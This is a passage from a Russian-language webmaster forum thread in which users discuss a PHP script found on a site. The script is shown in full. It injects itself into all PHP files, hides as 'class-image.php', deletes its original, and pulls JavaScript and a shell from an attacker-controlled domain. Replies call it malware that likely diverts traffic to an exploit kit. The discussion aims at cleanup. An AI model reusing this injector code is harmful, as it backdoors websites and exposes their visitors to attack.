        if (save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $packed_js, 1)) {
            echo "<b style:='color:green'>[{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br />[s5]<br />";
        } else {
            echo "<b color='red'>[{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br />";
        }
        echo "<small>";
        echo "<h3>INJECTING PHP FILES</h3>";
        check_engine_install();
        if (count($GLOBALS['dg_wpi']) > 0) {
            process_file_inject($GLOBALS['dg_wpi'][0], 1, 0);
            all_php_inject($GLOBALS['dgsp'], 0, 0);
        } else {
            all_php_inject($GLOBALS['dgsp'], 1, 0);
        }
        if ($_SERVER['SCRIPT_FILENAME'] < > $GLOBALS['dgcp'].$GLOBALS['dgmn']) {
            if (copy($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgcp'].$GLOBALS['dgmn'])) {
                echo "File {$_SERVER['SCRIPT_FILENAME']} copied";
            } else {
                echo "Failed to copy file {$_SERVER['SCRIPT_FILENAME']}";
            }
            unlink($_SERVER['SCRIPT_FILENAME']);
        } else {
            echo "No need to copy file {$_SERVER['SCRIPT_FILENAME']}";
        }
        echo "</small><hr /><b>dgok</b></div>";
    }
}
if (!isset($GLOBALS['dgbaw'])) {
    $GLOBALS['dgbaw'] = 1;
    if (isset($_GET['dgphpinfo'])) {
        phpinfo();
        die;
    }
    set_time_limit(1800);
    ignore_user_abort(true);
    $GLOBALS['dg_wpi'] = array();
    $GLOBALS['dgrules'] = array();
    $GLOBALS['dg_iver'] = "4.0";
    $GLOBALS['http'] = 'http:/'.
    '/';
    $GLOBALS['dgmn'] = "class-image.php";
    $GLOBALS['dgfn'] = "";
    $GLOBALS['dg_id'] = "";
    $GLOBALS['dgix'] = '\$'.
    'md5\s\=\s\"\w{32}\"\;\s*\$[^\s]+\s\=\s[^\s]+\;\s*\$[^\s]+\s\=\screate\_function[^\s]+\;\s*\$[^\s]+\s*(\S)';
    if (isset($_GET['dgd']) || isset($_POST['dgd'])) {
        error_reporting(E_ALL);
    } else {
        error_reporting(0);
    }
    if ($GLOBALS['dgmn'] && (!strpos($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgmn'])) || !file_exists($_SERVER['SCRIPT_FILENAME'])) {
        if (file_exists($_SERVER['PATH_TRANSLATED'])) {
            $_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
        } else {
            echo "<b color='red'>can't detect full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br />[e1]";
            die;
        }
    }
    if (!$GLOBALS['dg_id'] && isset($_GET['dgdomain']) && $_GET['dgdomain']) {
        $GLOBALS['dg_id'] = $_GET['dgdomain'];
    }
    if (!$GLOBALS['dg_id'] && isset($_POST['dgdomain']) && $_POST['dgdomain']) {
        $GLOBALS['dg_id'] = $_POST['dgdomain'];
    }
    if ((isset($_GET['dginit']) || isset($_POST['dginit']))) {
        if (!$GLOBALS['dg_id']) {
            die("[e13]");
        }
        $GLOBALS['dg_pu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=js&host={$_SERVER['HTTP_HOST']}";
        $GLOBALS['dg_eu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=shl&host={$_SERVER['HTTP_HOST']}";
        $_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
        $_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
        die(dg_main_init());
    } else {
        die("<!--mn ".$GLOBALS['dgmn'].
        "-->");
    }
}


Сообщение отредактировал x64 - 16.1.2013, 12:42


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Biznessman
Biznessman
Topic Starter сообщение 16.1.2013, 13:00; Ответить: Biznessman
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 686
Регистрация: 22.7.2009
Из: Україна
Поблагодарили: 187 раз
Репутация:   49  


Код снес. Сайт работает без проблем (по крайней мере пока ничего аномального не обнаружил).

А что хоть делает этот код?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
viston
viston
сообщение 17.1.2013, 11:40; Ответить: viston
Сообщение #8


Завсегдатай
*****

Группа: Active User
Сообщений: 549
Регистрация: 19.1.2010
Из: Приморский край город Уссурийск
Поблагодарили: 98 раз
Репутация:   16  


Что это за код , был у меня такой же код на сайте.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 18.1.2013, 0:12; Ответить: Rxp
Сообщение #9


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


Вредоносный код 100%, ТС ищите источник иначе все потоврится.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kosmo987
kosmo987
сообщение 18.1.2013, 19:03; Ответить: kosmo987
Сообщение #10


Новичок
*

Группа: User
Сообщений: 18
Регистрация: 18.1.2013
Поблагодарили: 1 раз
Репутация:   0  


сливают ваш траф на связку скорее всего
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыPHP код для og:image в Джумла
Нужен PHP код для заполнения мета тега meta property
8 Курыкин 1362 25.10.2017, 12:06
автор: Fassendek
Открытая тема (нет новых ответов) Промо код Гугл Эдвордс 2000 рублей
Может кому то будет нужен
3 alllffa 871 9.10.2017, 12:12
автор: alllffa
Открытая тема (нет новых ответов) Заменить в шаблоне (WP) шапку и меню
0 Infe 447 21.6.2017, 15:46
автор: Infe
Открытая тема (нет новых ответов) Иконки в шаблоне.
3 SOROKVLAD29 1430 6.6.2017, 16:01
автор: ZaDrotom
Открытая тема (нет новых ответов) Требуется поправить (оптимизировать) код вёрстки WP
0 Seo-optimist 747 26.12.2015, 21:19
автор: Seo-optimist


 



RSS Текстовая версия Сейчас: 17.12.2017, 12:45
Дизайн